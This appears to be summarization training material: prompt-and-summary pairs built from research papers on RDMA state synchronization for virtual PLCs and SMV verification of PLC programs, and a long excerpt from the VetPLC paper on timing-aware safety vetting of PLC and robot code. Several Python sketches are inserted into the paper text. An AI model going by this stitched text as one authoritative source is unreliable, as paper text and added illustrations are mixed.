In this work, we successfully implemented an RDMA-based high availability solution for stateful applications with hard real-time requirements. The presented concept is scalable through the increase of network bandwidth, partial state transfer and scheduling mechanisms, and is suitable for VM and container environments. We applied the concept to an available software PLC and enable the synchronization of state sizes of multiple MB while meeting RT requirements, through an increase of synchronization speed by up to 200 times. This is the first step for a variety of applications, especially in factory and process automation such as PLCs, to be realized on a distributed system while also meeting the stringent availability requirements of the automation domain. Future research activities may focus on the usage of Kubernetes and improvements in state synchronization and scheduling. Moreover, distributed consensus mechanisms could be applied to these specific use cases to improve the robustness in failover scenarios. Finally, an implementation of RDMA over DetNet might be a suitable alternative to RoCE to guarantee packet delivery and enable deterministic behaviour.
ACKNOWLEDGMENT
The presented concept was developed within the cluster Digital Production of the Research Institute AImotion Bavaria of the Technische Hochschule Ingolstadt. The project is funded by AUDI AG. We thank CODESYS for providing a customizable software PLC and support.
Summary:
Cloud computing is becoming more popular in domains where previously hardware-based bare-metal implementations dominated the field of computation workloads, such as the automation and process industry. A variety of stateful applications exist that will require high availability on cloud infrastructures while also meeting the hard real-time requirements in the millisecond range of their superimposed processes, e.g., virtualized programmable logic controllers (vPLCs) and artificial intelligence inference services. This paper presents an approach for stateful applications on distributed systems to meet the application's requirements in failover scenarios through state synchronization by means of Remote Direct Memory Access (RDMA). Experimental results with a software PLC confirm the effectiveness of the described approach in comparison to UDP-based synchronization, reducing the average synchronization time by up to 99.39%. The concept is suitable for applications on virtual machines and containers and might be an enabler for the virtualization of real-time critical applications such as control functions in the automation and process industry.
|
Summarize:
1 Introduction The objective of the work reported in this paper is to create an interface between the programming and modeling tools typically used by control engineers and the model checking program SMV, an established tool for formal verification of digital circuits and protocols [1], [2]. This provides a means for validating a controller implementation over all possible operating conditions (as represented by the model of the plant) before it is used on the real system. An important feature of the transformation is that the SMV model retains the structure and variable
Summary:
This paper presents an approach to the verification of programs for programmable logic controllers (PLCs) using SMV, a software package for formal verification of state transition systems. Binary PLC programs are converted directly into SMV modules that retain the variable names and execution sequences of the original programs. The system being controlled is modeled by a C/E system block diagram, which is also transformed into a set of SMV modules, retaining the structure of the block diagram model. SMV allows the engineer to verify the behavior of the control program over all possible operating conditions. Mechanisms are discussed for representing correctly the concurrent execution of the PLC programs and the plant model using SMV primitives. The SMV approach to PLC program verification is illustrated with an example.
|
Summarize:
I. INTRODUCTION
Industrial control systems (ICS) play an essential role in modern society. In the new era of Industry 4.0 [12], computerized control systems have become the backbone of crucial infrastructures such as power grids, transportation as well as manufacturing sectors. Compared to traditional ICS that were constructed using fixed electronic circuits, programmable logic controllers (PLC) have brought flexibility, configurability and automation to these domains. However, this freedom has also introduced complexity, and thus uncertainty, to safety-critical physical plants. Unexpected logic errors may cause serious problems such as fatal collisions or massive explosions. Reports have shown that anomalous ICS behaviors have resulted in loss of life on real-world factory floors [11], [19]. In addition, security problems are highly coupled with safety issues in the ICS domain. In fact, physical damage is one of the major goals of security breaches in ICS. Compared to attacks targeting consumers or IT systems, which often aim to make profits or steal data, cyberattacks on factory floors are intended to sabotage physical infrastructures. Real-world incidents, including Stuxnet [36], the German Steel Mill Cyber Attack [49], and the Ukrainian Power Grid Attack [50], have shown that although adversaries must first leverage security penetration techniques to infiltrate the digital layers of modern plants, they often attempt to manipulate critical safety parameters, such as the frequency of nuclear centrifuges, and trigger benign but faulty code, to cause serious damage. Hence, there is a need for detecting situations where such safety violations can occur. Due to the complexity of contemporary ICS, which involves interactions between PLCs and various other machines, we need automated mechanisms to find such problems.
While there exists work [24], [28], [30], [31], [42], [44], [57], [58], [61], [63], [65] that aims to statically verify PLC logic in a formal manner, such static analysis techniques suffer from significant false positives since they are unable to reason about runtime execution contexts. For instance, they may detect potential problematic paths in the code that are infeasible at runtime. In addition, the behavior of ICS is strictly constrained by physical limits at runtime (e.g., velocity, temperature, etc.) as well as changes to these properties. To address these limitations, prior work [35], [39], [45], [62] has explored the usage of dynamic simulations of runtime behaviors to detect PLC safety violations. In addition, recent work [43], [54] has enabled symbolic execution on PLC code. Despite their apparent effectiveness in finding bugs in independent PLC programs, these techniques are limited because they overlook an important fact: a real-world PLC is never working alone. On the contrary, it collaborates with other programmable components on the factory floor, such as robots, CNCs or even other PLCs, to carry out certain tasks. Hence, PLC logic is not only triggered by internal data inputs but also driven by external events due to the coordination and communication among multiple units. Unfortunately, the aforementioned work focuses mainly on the testing or resolution of input values and not on the complete event space of multiple collaborating components, and thus cannot automatically exercise real-life PLC programs. To address this problem, we propose VETPLC, a temporal context-aware, program analysis-based system that automatically constructs timed event sequences. These sequences can then enable automated dynamic safety vetting of PLC code.
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply.
Although they are still lacking in the PLC context, automated dynamic analysis and symbolic execution on event-driven programs have been well studied in the smartphone [27], [46], [55], [67] and web [51], [66] domains. To model non-deterministic events, researchers have proposed to automatically generate event sequences of different orders, based upon program models [67] or testing [27], [46], [51], [55], [66], to drive program execution. Yet permutation of events is insufficient to describe the conditions that lead to safety violations in PLC code. The timings at which events are delivered matter. This is because PLC events have implicit temporal dependencies caused by both intrinsic durations and external physical constraints. Our key observation is that multiple event sequences of the same valid order may or may not lead to safety violations due to the different timings between events. Thus, generating timed event sequences is a requisite step to successfully reveal safety issues in PLC code. VETPLC therefore complements the prior research on dynamic analyses and symbolic execution that search merely the value space in PLC code. It further introduces novel techniques to explore the timed event space so as to effectively exercise and examine PLC programs.
Specifically, (a) to uncover the order of triggering events, we first perform static program analyses on controller code (of the various interconnected units), including PLC and robot code, and generate timed event causality graphs to represent the temporal dependencies of cross-device events; (b) to quantitatively model the timing of events, we analyze the controller code to extract internal time limits, collect runtime data traces from physical ICS systems and then leverage data mining to recover temporal invariants; (c) combining this timing model with the causality graphs, we then create timed event sequences that can serve as inputs for any dynamic PLC code analyses; to enable automated safety vetting, we formally define and manually craft safety specifications based upon expert knowledge and conduct runtime verification on PLC execution traces. It is worth noting that previous research has also sought to create timed event sequences for testing event-driven real-time programs. Event sequences have been produced from either manually crafted specifications [48] or profiling program execution time [52]. In contrast, we automatically extract event ordering and timing using program analyses and data mining, and further enable this technique in the new domain of PLCs and broadly in the context of ICS. To the best of our knowledge, we are the first to enable timing-aware safety vetting on event-driven, time-constrained PLC code for real-world ICS, in particular via extracting event temporalities from program logic and physical environments. We have implemented VETPLC in 15K lines of code: 7K lines of C++ and 8K lines of Java. To demonstrate the efficacy of our approach, we apply it to 10 real-world scenarios on two ICS testbeds that are of completely different physical compositions: (i) the SMART [47] testbed is a scaled-down yet fully functional automotive production line, and (ii) the Fischertechnik testbed replicates a consecutive part processing facility controlled by multiple collaborative PLCs.
Note that the PLC programs under examination remain intact, and we did not introduce vulnerable code into them. Experimental results show that VetPLC outperforms the state-of-the-art techniques and can effectively produce event sequences that lead to deep and authentic safety bugs, which are already hidden in real-world PLC code due to developers' mistakes. In summary, this paper makes the following contributions:
- We explore physical ICS testbeds to gain an important insight: real-world controller code is event-driven and timing-sensitive.
- We are the first to automate dynamic safety vetting of real-world PLC code via the creation of timed event sequences.
- We use custom static analyses, which address the specific programming paradigms of PLCs, to extract causal relationships among events. To the best of our knowledge, this is the first work that distills temporal dependencies in physical ICS testbeds.
- We have demonstrated the effectiveness of VetPLC on two different types of real-world ICS testbeds: VetPLC has found organic vulnerabilities in real-world testbeds.

II. BACKGROUND
Programmable Logic Controller. A programmable logic controller [18] is the core control unit of a large number of modern automation systems. It can be used either as a separate master controller or integrated as a slave controller into other machines such as CNCs. The basic functionality of a PLC is to repeatedly generate control commands based on input signals and internal control logic. On startup, a PLC runs in an infinite loop where each iteration, called a scan cycle, consists of three major phases. 1) Input: the PLC reads inputs from external events (e.g., sensors) and buffers them in memory. 2) Computation: all variable values are fixed. The PLC then invokes its logic program and calculates new variable states based on the buffered inputs and their current states. 3) Output: the PLC writes the computed new states into output memory in order to start the next cycle.
PLC programming languages follow the international standard IEC 61131-3 [10]. It defines three graphical languages and two textual languages. All of the languages share IEC 61131-3 common elements and can be translated into each other. In particular, Structured Text (ST) is a high-level textual language that syntactically resembles Pascal (Figure 2) and thus is known for its understandability [20]. Notice, however, that although an ST program resembles those written in other high-level languages, its data flow is very different due to the existence of scan cycles. Since PLC variables are kept intact during the computation phase, value changes caused by logic code do not become effective until the next cycle. In effect, in any scan cycle, a PLC variable bears two versions: the current version from the last cycle is effective at the present time; the new version records all the changes in the current round and eventually replaces the current one during the output phase. As a result, 1) there exists no data flow within one scan cycle; 2) data flow happens between two neighboring cycles, and the current value of a variable may be the result of any assignment instruction in the last cycle.

Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:41:19 UTC from IEEE Xplore. Restrictions apply.

Industrial Robot. An industrial robot is essential for performing various actuations, such as assembly, pick-and-place, packaging, etc. Robot programming languages of individual vendors are proprietary but in general fall into two categories: high-level and low-level. High-level languages, such as KAREL for FANUC robots or RAPID for ABB, are influenced by the Pascal syntax. Low-level code is assembly-like, and is developed through teach pendants, which are handheld devices directly connected to robots.
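The two-version semantics described above can be illustrated with a small simulation. The sketch below is ours, not the paper's tooling; the variable names and logic are invented purely to show that a write in one scan cycle only becomes readable in the next:

```python
# Illustrative sketch (assumed example, not from the paper) of PLC
# scan-cycle semantics: all reads in a cycle see the snapshot taken at
# the start of the cycle; writes become visible only in the next cycle.

def scan_cycle(state, inputs, logic):
    """One PLC scan cycle: Input -> Computation -> Output."""
    snapshot = {**state, **inputs}   # Input phase: values are fixed
    new_state = dict(snapshot)
    logic(snapshot, new_state)       # Computation phase: reads use snapshot
    return new_state                 # Output phase: writes become current

def logic(cur, new):
    # 'b := a; c := b;' -- c sees the OLD b, not the one just assigned,
    # because there is no data flow within a single scan cycle.
    new["b"] = cur["a"]
    new["c"] = cur["b"]

state = {"a": True, "b": False, "c": False}
state = scan_cycle(state, {}, logic)
print(state["b"], state["c"])   # True False: c lags one cycle behind
state = scan_cycle(state, {}, logic)
print(state["c"])               # True: the change propagated in cycle 2
```

In a conventional imperative language, `c` would already be true after the first pass; the one-cycle lag is exactly the cross-cycle data flow the paper's analysis has to model.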
Aside from common program instructions (e.g., assignments, conditional or unconditional jumps and function calls), these programs all employ special motion instructions to guide physical movements and use wait instructions to enable delays and control timings. While robot programs can be launched via a main function, in practice they are triggered dynamically by input events. The mapping between triggering signals and call targets is configured using teach pendants. Without loss of generality, we hereafter explain robot inner-workings based upon pick-and-place robots from FANUC, which has the most industrial robots installed worldwide [56]. Specifically, we focus on its teach pendant (TP) language, depicted in Figure 8, which is the de facto standard to program FANUC robots [1].
Cross-Device Communication. A PLC and a remote device communicate via signals using industrial network protocols, such as EtherNet/IP [8]. The remote device opens multiple pins for inputs and outputs. For example, a FANUC robot can enable 512 bits of digital inputs (DI) and 512 bits of digital outputs (DO). On the PLC side, each remote pin is mapped as a base address (i.e., IP address) plus an offset. Thus, PLC code can control a remote device by directly accessing these mapped I/O bits. The I/O mappings are automatically configured when a remote device is added to an ICS environment supervised by a PLC. Once its IP address is determined, the underlying EtherNet/IP protocol takes the responsibility to recognize the I/Os on this device and bind them to PLC variables.

III. PROBLEM STATEMENT & APPROACH OVERVIEW
A. Motivating Example
We motivate our problem using our SMART testbed [47], depicted in Figure 1. This testbed represents a fully functional assembly line that produces model cars. It consists of a gantry crane, a circular conveyor belt, 2 pick-and-place robots, 3 CNC (Computer Numerical Control) machines, and is controlled by a PLC.
Particularly, it is equipped with an Allen-Bradley PLC from Rockwell Automation1 and FANUC robots2. It is worth noting that the SMART testbed is a miniature of real-world automotive manufacturing sectors. It has been established and constantly upgraded for over 20 years, and has been used for numerous projects over the decades.

1 Leading PLC supplier in North America w/ 60% of the market share [17]
2 The most popular industrial robots worldwide [1]

Fig. 1: SMART Testbed for Manufacturing Model Vehicles

This testbed was developed by engineers from Rockwell Automation, faculty and graduate students: the hardware components and the way they connect precisely resemble those on real-world factory floors; a large body of controller code (e.g., robot motion, CNC operation, RFID I/O, etc.) was directly borrowed from industry practices [7]. The fidelity of this control system has been verified through consistent collaboration with Rockwell Automation.
Physical Compositions. The gantry system serves as the entry and exit points of the testbed. It delivers empty pallets to CNC machine #1 to start the manufacturing processes and, eventually, it removes the produced parts from the conveyor. The circular conveyor belt is always on and keeps moving the pallets around the robots and CNCs. The robots and CNC machines are organized into two cells to accomplish different tasks (e.g., molding, flipping, etc.), where Cell 1 is comprised of Robot #1 and CNC #1, and Cell 2 contains the rest. Immediately in front of each cell are RFID transceivers that can sense the presence of incoming pallets, empty or loaded, because RFID tags are attached to both pallets and parts. The RFID tag on a part maintains a numerical value indicating its next manufacturing process. A pallet stopper is also installed at every cell to block moving pallets. By default, the stopper is always enabled to block any arriving pallets unless a signal that indicates otherwise is received.
PLC and Robot Logics.
Figure 2 and Figure 8 (in Appendix A) show, in part, the control logic of the PLC and Robot #1 in Cell 1, respectively. The code snippets depict how a processed part is passed from CNC to conveyor. Since a raw part has been delivered by the gantry to the CNC for processing, the PLC code (Figure 2) is now expecting to receive the processed part and deliver it to the next cell using an empty pallet. The coordination between PLC and robot is realized through events. In order to receive and send these signals, 6 input variables (Ln.3-7,52), 2 output variables (Ln.8-9) and 4 internal variables (Ln.11-13,49) are declared. In each scan cycle, the PLC first clears the output variables during initialization (Ln.16-19) and then checks all the input variables sequentially to update the outputs (Ln.21-44). More concretely, Ln.21-23 first update the availability of an empty pallet at Cell 1 (Pallet_Arrival) by checking the presence of a pallet (Pallet_Sensor) and also the absence of a part (NOT(Part_Sensor)). If, however, an incoming pallet is already loaded with a part (Ln.25-27), the PLC will send a signal via Retract_Stopper to retract the stopper and let this pallet pass through. When an empty pallet has arrived at
1  PROGRAM CELL1
2    VAR
3      Pallet_Sensor AT %IX0.1 : BOOL;
4      Part_Sensor AT %IX0.2 : BOOL;
5      CNC_Part_Ready AT %IX0.3 : BOOL;
6      Robot_Ready AT %IX0.4 : BOOL; //DO[6]
7      Part_AtConveyor AT %IX0.5 : BOOL; //DO[2]
8      Retract_Stopper AT %QX0.1 : BOOL;
9      Deliver_Part AT %QX0.2 : BOOL; //DI[0]
10
11     Pallet_Arrival AT %MX0.1 : BOOL;
12     Update_Part_Process AT %MX0.2 : BOOL;
13     Update_Complete AT %MX0.3 : BOOL;
14   END_VAR
15
16   Pallet_Arrival := false;
17   Retract_Stopper := false;
18   Deliver_Part := false;
19   Update_Part_Process := false;
20
21   IF Pallet_Sensor AND NOT(Part_Sensor) THEN
22     Pallet_Arrival := true;
23   END_IF;
24
25   IF Part_Sensor THEN
26     Retract_Stopper := true;
27   END_IF;
28
29   IF Pallet_Arrival AND CNC_Part_Ready AND Robot_Ready AND NOT(Part_AtConveyor) THEN
30     Deliver_Part := true;
31     Update_Part_Process := true;
32     CNC_Part_Ready := false;
33     Robot_Ready := false;
34   END_IF;
35
36   IF Update_Part_Process THEN
37     //Call subroutine to update process No.
38     UPDATE_PART(2);
39   END_IF;
40
41   IF Update_Complete AND Part_AtConveyor THEN
42     Retract_Stopper := true;
43     Update_Complete := false;
44   END_IF;
45 END_PROGRAM
46
47 PROGRAM UPDATE_PART
48   VAR_INPUT
49     Part_Process AT %MD50 : DWORD;
50   END_VAR
51   VAR
52     RFID_IO_Complete AT %IX0.6 : BOOL;
53     Update_Complete AT %MX0.3 : BOOL;
54   END_VAR
55   //Perform 15-step I/O operations on RFID
56   ...
57   IF RFID_IO_Complete THEN
58     Update_Complete := true;
59   END_IF
60 END_PROGRAM

Fig. 2: PLC ST Code for Picking Up Processed Parts

Cell 1, the PLC code (Ln.29-34) will further check the Boolean inputs CNC_Part_Ready, Robot_Ready and NOT(Part_AtConveyor) to confirm the existence of a processed part, the availability of the robot and the clearance of parts on the conveyor, respectively. If all the conditions are satisfied, the PLC will then perform two actions: 1) requesting the robot to pass the processed part to the pallet and 2) updating the manufacturing process number on the part.
Two signals, Deliver_Part and Update_Part_Process, are thus enabled.
1) Deliver_Part. Based upon configuration, the variable Deliver_Part is mapped to a digital input (DI[0]) on the robot side. Being true, this signal triggers the robot program in Figure 8 to execute. The robot code then operates the robot arm, via a series of motion instructions such as linear movement L or joint movement J, in order to pick up a part from the CNC machine (Figure 8 Ln.6-12) and pass it to the conveyor (Figure 8 Ln.18-20). When the part has been delivered to the conveyor, the robot turns on its output signal DO[2] for 0.5 seconds to indicate the completion (Figure 8 Ln.22-24). This output is then mapped to Part_AtConveyor on the PLC. In the end, the robot returns to a safe zone.
2) Update_Part_Process. When this variable is true, a subroutine UPDATE_PART(int) is called to conduct a 15-step I/O operation on the RFID attached to the part (Ln.36-39). When this is done, the subroutine (Ln.47-60) will receive a RFID_IO_Complete signal and then notify its caller by setting the Boolean variable Update_Complete. To check whether the two actions are completed, the PLC constantly reads two response signals, Part_AtConveyor and Update_Complete. When both signals are true, the PLC will retract the stopper to transfer this loaded pallet (Ln.41-44).
Safety Violation and Root Cause. This code, in fact, can lead to item overflow [9], which is a typical type of safety issue on the factory floor. Fundamentally, it is caused by mismatched expectations between the sender (robot) and receiver (PLC) of event Part_AtConveyor's duration. The signal Part_AtConveyor has dual purposes. When it is true, it indicates the robot has delivered a part to the pallet, which can now leave the cell. When it is off, that means the conveyor has been cleared to accept a new part, and the robot can then move away from the conveyor for another delivery.
However, in practice, the robot does not need to stop at the conveyor waiting for the pallet to leave. Although the robot cannot pass the second part to the conveyor prior to the departure of the first one, the robot can, in fact, move towards the CNC in advance to save time for the next delivery. For the sake of saving time, the developers implemented a timeout in the robot code and only allowed the event Part_AtConveyor (DO[2]) to last for 0.5 seconds (Figure 8 Ln.23-24), whether or not the conveyor is cleared by then. As a result, the robot is guaranteed to start handling another delivery 0.5 seconds after the previous one. Unfortunately, if the robot turns off Part_AtConveyor prematurely, the PLC may never see both Part_AtConveyor and Update_Complete being set to true at the same time, either due to an unexpectedly fast part delivery or a slow RFID update. This is also because PLC developers typically do not buffer old signal values (in this case, Part_AtConveyor being TRUE) but rather always read data directly from their origins, in order to avoid synchronization problems. In fact, a real-world error has been reported from the SMART testbed when the speed of the robot is increased to a certain extent, and thus Part_AtConveyor ends even before the update of the process number is complete. Then, there exists no window when both Update_Complete and Part_AtConveyor are true (Figure 3b). In that case, even if the pallet has already been loaded, it can never leave the cell. This error can cause a serious safety issue since the conveyor will overflow due to the constantly arriving pallets.
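This race can be reproduced in a minimal discrete-time simulation. The sketch below is ours, not VetPLC's tooling: the 0.5 s pulse comes from the robot code described above, while the RFID update times and the 0.1 s time step are assumed values chosen for illustration.

```python
# Sketch (with assumed timings) of the Part_AtConveyor race: the robot
# holds DO[2] (Part_AtConveyor) for only 0.5 s, while the RFID update
# takes a variable amount of time. The PLC retracts the stopper only if
# it ever observes both signals true simultaneously.

def pallet_released(rfid_update_secs, pulse_secs=0.5, step=0.1):
    t, released = 0.0, False
    while t <= 10.0:
        part_at_conveyor = t < pulse_secs        # robot's timed pulse
        update_complete = t >= rfid_update_secs  # RFID update finishes
        if part_at_conveyor and update_complete:
            released = True                      # PLC retracts the stopper
        t += step
    return released

print(pallet_released(rfid_update_secs=0.3))  # True: update beat the pulse
print(pallet_released(rfid_update_secs=2.0))  # False: no overlap -> overflow
```

The second call models the reported SMART error: once the RFID update outlasts the 0.5 s pulse, no window exists in which both signals are true, so the loaded pallet is never released.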
Fig. 3: Event Sequences with Different Orders and Timings ((a) Sequence 1, (b) Sequence 2, (c) Sequence 3)

Eventually, it will cause pallets to collide and fall, or even cause the overloaded conveyor to break. Though seemingly straightforward, this is in fact a typical safety violation that can cause severe injuries on the factory floor and thus has attracted attention in both industrial practices [5], [6], [9] and academic research [37]. It is worth noting that although we highlight this issue using a collaborative PLC and a robot, it is actually a common problem that can be caused by the coordination of any types of controllers, such as multiple PLCs, PLCs and CNCs (controlled by an integrated slave PLC) or CNCs and robots.
Both our experience and domain knowledge from field engineers (from Rockwell) show that a large portion of PLC safety problems originate from the coordination required between multiple units, because these units are manufactured by different vendors and programmed individually without considering different contexts (e.g., timing). Nevertheless, we believe the problem involving PLCs and robots is the most challenging one to address because it requires the understanding of multiple programming languages and their interactions. Hence, we focus on such a case to explain our approach. However, as we show in the evaluation, our system can be applied to other classes of coordinating systems as well.
Challenge for Detecting the Problem. Static analyses may cause significant false positives due to the lack of runtime constraints and thus cannot easily address this problem. For instance, a potential error state detected by static analysis may only be triggered when the speed of the robot is greater than 10 m/sec, which however can never be reached in practice. In contrast, dynamic analysis and symbolic execution do not cause false positives. To use them on event-driven programs, prior work [27], [46], [51], [55], [66], [67] generated event sequences of different orders to exercise code and explore paths. In our case, one can create an event sequence following the order of 1:Pallet_Sensor → 2:¬Part_Sensor → 3:CNC_Part_Ready → 4:Robot_Ready → 5:Part_AtConveyor → 6:Update_Complete → 7:¬Part_AtConveyor, as illustrated in Figure 3a. Note that eventually Part_AtConveyor terminates due to the robot logic. Exercising PLC code using such a sequence does not lead to any error. One can then permute the events by switching 6:Update_Complete and 7:¬Part_AtConveyor (Figure 3b). Then, the safety problem will occur at runtime.
However, just rearranging the event order may not solve the path discovery problem in time-constrained controller programs. For instance, the event sequence in Figure 3c shares the same ordering as the one in Figure 3b, yet it cannot cause the error. When the time difference between events 7 and 6 changes, the consequence may also vary. To address this problem, we expect to automatically produce effective, error-triggering event sequences (such as Figure 3b) by considering both the ordering and the timing of events. Notice that an alternative approach is to model internal timeouts as external events and then perform event permutation without considering timing. For example, the termination of event Part_AtConveyor can then become another independent event, and the permutation thus is conducted over 8 events. However, we would argue that this solution has two major shortcomings: 1) it may drastically increase the event space; and 2) the generated sequences can cause false alarms because they may still violate critical time and physical constraints and thus are actually invalid. Its fundamental limitation lies in the fact that it assumes the complete independence of individual events and does not quantitatively consider their temporal contexts.

Fig. 4: Overview of VetPLC System

B. Threat Model
We consider that adversaries can trigger vulnerabilities in benign (but faulty) PLC code via manipulation of configuration options that impact important physical properties such as machine speeds.
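To make the ordering-versus-timing distinction concrete, a timed event sequence can be encoded as (event, timestamp) pairs. The check below is an illustrative sketch of ours, assuming the 0.5 s Part_AtConveyor duration from the robot code and hypothetical timestamps; it is not VetPLC's sequence generator.

```python
# Sketch: two timed event sequences with the SAME order but different
# timings. The violation fires only when Update_Complete arrives after
# Part_AtConveyor's 0.5 s window has closed (timestamps are assumptions).

PULSE = 0.5  # duration of Part_AtConveyor, from the robot's timeout

def violates(seq):
    """seq: list of (event, time) pairs. True if the PLC can never see
    Update_Complete while Part_AtConveyor is still on."""
    times = dict(seq)
    t_conv = times["Part_AtConveyor"]
    t_upd = times["Update_Complete"]
    return not (t_conv <= t_upd < t_conv + PULSE)

same_order_a = [("Deliver_Part", 0.0), ("Part_AtConveyor", 3.0),
                ("Update_Complete", 3.2)]
same_order_b = [("Deliver_Part", 0.0), ("Part_AtConveyor", 3.0),
                ("Update_Complete", 4.0)]
print(violates(same_order_a))  # False: the two signals overlap
print(violates(same_order_b))  # True: same order, bad timing
```

Both sequences have the identical event order, so any order-only permutation scheme treats them as equivalent; only the timestamps separate the benign run from the violating one.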
In addition, we also consider that insiders can compromise PLC source code to intentionally inject (stealthy) safety violations (e.g., PLC logic bombs [41]). Note that insider attacks are top security challenges [40], [64] for air-gapped ICS and have been identified in major ICS incidents including Stuxnet and the Maroochy Water Services Attack [23]. As a result, PLC source code and configurations may not be trustworthy. Note, though, that we assume the rest of the ICS environment (including hardware and operating systems), as well as our data collection mechanisms, is trusted. It is worth mentioning that, at this point, our work is mainly focusing on the detection of safety violations. However, some of the techniques we developed can also be useful to address security challenges in the ICS context.
C. System Overview
To achieve our goal, we have developed VetPLC, which consists of 3 major steps. Figure 4 illustrates its architecture. We hope to deploy VetPLC as a vetting tool to examine any PLC code before it is released for a production system.
(1) Generating Event Causality Graphs. Given the PLC and robot code, we first perform static program analyses to extract the event causality graphs for interconnected devices. We further leverage specified I/O mappings to handle cross-device communication.
(2) Mining Temporal Invariants. Next, to understand those quantitative temporal relations that cannot be revealed by program code, we collect runtime data traces of PLC variables from physical ICS testbeds. We then examine the traces to infer the occurrences of particular events and conduct data mining to discover temporal event invariants.
(3) Automated Safety Vetting with Timed Event Sequences.
Constrained by the generated timed event causality graphs, we perform event permutations to automatically create timed event sequences. Then, we apply the generated sequences to exercise PLC code for dynamic analysis. To automatically identify safety problems, we formalize and craft safety specifications according to expert knowledge so as to perform runtime verification.

IV. TIMED EVENT CAUSALITY GRAPH
A. Key Factors
A naive approach to deriving event sequences is to consider every combination of events. For instance, prior work has presented a baseline approach, ALLSEQS [27], that exhaustively permutes all UI events to create triggering sequences for testing Android apps. However, due to the massive possible permutations, such a solution can be prohibitively time-consuming. In fact, not all permutations are valid sequences because the causal dependencies of PLC events are inherently constrained by controller code. To reduce the search space, we can extract such dependencies from program logic in the first place. Particularly, we are interested in three causal factors.
Control-Flow. We take into account intra-procedural, inter-procedural and cross-device control-flow dependencies: 1) within a function, event variables evaluated in an IF-Condition have direct causal impact on those defined in its IF-Clause; 2) for function calls, we consider that the call site in the caller causes all the logic in the callee; 3) cross-device event exchanges via mapped I/O indicate the causal relations between code on multiple controllers.
Constants. The constant value of an event-related variable in an IF-Condition can partially determine whether the IF-Clause becomes effective. Thus, the data flow from the constant assignment to the condition check of this variable indicates that the former causes the latter.
Event Duration. The causal effect of events may last for a certain amount of time when subsequent states are maintained.
Machines with local memory can produce events with permanent states. The PLC can also help preserve the states of transient signals (i.e., sensor readings) or its internal events. In the meantime, event senders can also proactively terminate signals based upon timing. In addition to these internal factors, the occurrences of events are also affected by external timing constraints caused by physical actions, such as robot motion and external I/O operations. We will discuss this in Section V.
B. Formal Definition
To interpret the internal constraints on event ordering, we extract the causal and temporal relations among events from PLC and robot code to generate dependency graphs. In particular, we describe the cross-device event dependencies
Fig. 5: The TECG of the Motivating Example

using Timed Event Causality Graphs (TECGs). At a high level, a TECG is based upon the And-Or Graph [53], which can illustrate the causalities among events and express their and/or relationships. A formal definition is presented as follows.
Definition 1. A Timed Event Causality Graph is a directed graph G = (V, E, α, τ) over a set of events Σ and a set of time durations T, where:
- The set of vertices V corresponds to the events in Σ;
- The set of edges E ⊆ V × V corresponds to the causal dependencies between events, where the combination of all immediate predecessors of a vertex can always cause this successor event to happen. Specifically, if some of these predecessor vertices form a conjunction, their outgoing edges become compounded using an arch; if they form a disjunction, the corresponding edges are separated.
- The labeling function α : V → Σ associates nodes with the labels of corresponding events, where each label is comprised of 3 elements: event name, class and duration. An event is named after the atomic proposition it affects. For instance, if an event causes a==15 to be true, we name it a==15; if it causes Boolean c to be false, we refer to it as ¬c. We consider 6 classes of events, including the input (P_IN), output (P_OUT) and local (P_Local) events of the PLC and those of a remote device (R_IN, R_OUT, R_Local). The event duration is either Permanent (P), meaning it is always enabled until turned off by PLC logic, or a finite amount of time.
- The labeling function τ : E → T associates edges with the labels of time intervals. These labels are concrete numbers if we can retrieve the corresponding time intervals from ICS testbeds; otherwise, they are Indeterminate.

C. TECG of the Motivating Example
Figure 5 depicts the TECG of the motivating example. At first, this automation system expects to receive events from two sensors.
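Definition 1 can be encoded as a small data structure. The sketch below is one illustrative encoding of ours, not the paper's implementation; the class names follow the definition, while the "!" prefix for negative events and the grouping representation are our conventions.

```python
# Sketch of a Timed Event Causality Graph per Definition 1: vertices are
# events labeled with (class, duration); edges may carry time intervals;
# conjunctive predecessors are grouped ("compounded edges"), so the whole
# group is required to cause the successor, while separate groups are
# alternative (OR) causes.

class TECG:
    def __init__(self):
        self.labels = {}     # event -> (class, duration); "P" = Permanent
        self.causes = {}     # event -> list of predecessor groups
                             # (AND inside a group, OR across groups)
        self.intervals = {}  # (src, dst) -> (lo, hi) or None (Indeterminate)

    def add_event(self, name, cls, duration="P"):
        self.labels[name] = (cls, duration)

    def add_compound_edges(self, group, dst, interval=None):
        self.causes.setdefault(dst, []).append(tuple(group))
        for src in group:
            self.intervals[(src, dst)] = interval

g = TECG()
g.add_event("Pallet_Arrival", "P_Local")
g.add_event("DO[2]", "R_OUT", duration=0.5)  # robot's 0.5 s pulse
g.add_compound_edges(["Pallet_Sensor", "!Part_Sensor"], "Pallet_Arrival")
print(g.causes["Pallet_Arrival"])  # [('Pallet_Sensor', '!Part_Sensor')]
```

The compounded-edge call mirrors the arch notation in the definition: both sensor events together, not either alone, cause Pallet_Arrival.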
The conjunction of a positive event, Pallet_Sensor, and a negative one, ¬Part_Sensor, triggers the PLC local event Pallet_Arrival. Then, if all of the 4 events, Pallet_Arrival, CNC_Part_Ready, Robot_Ready and ¬Part_AtConveyor, are received, the PLC will signal the robot via an output event Deliver_Part. Hence, the conjunction of these four events leads to the generation of Deliver_Part, and such a causal dependency is represented by the compounded edges from the former to the latter. Further, Deliver_Part is mapped to the robot event DI[0], which causes the robot arm to function. Once its operation is completed, the robot turns on the output DO[2] and in effect sends the event Part_AtConveyor back to the PLC. Thus, these events are connected due to cross-device control dependencies. Since DO[2] (Part_AtConveyor) terminates in 0.5 seconds according to the robot code, its duration is 0.5s instead of Permanent. In the meantime, when the conjunction of the aforementioned 4 events is satisfied, another PLC local event Update_Part_Process will occur. This event causes a subroutine call, in which the PLC starts to update the process number encoded in the RFID on the part. Once the update is done, the RFID replies to the PLC with RFID_IO_Complete, which in turn triggers the Update_Complete event that the main routine expects. By default, the time intervals of all edges are Indeterminate, and thus are not shown on this graph. We later perform data mining on traces collected from ICS testbeds to extract temporal invariants associated with certain edges, such as Update_Part_Process →[3s, 39.4s] RFID_IO_Complete.
D. Graph Construction
To generate TECGs, we perform static analyses that are tailored for the unique programming paradigms of PLC code.
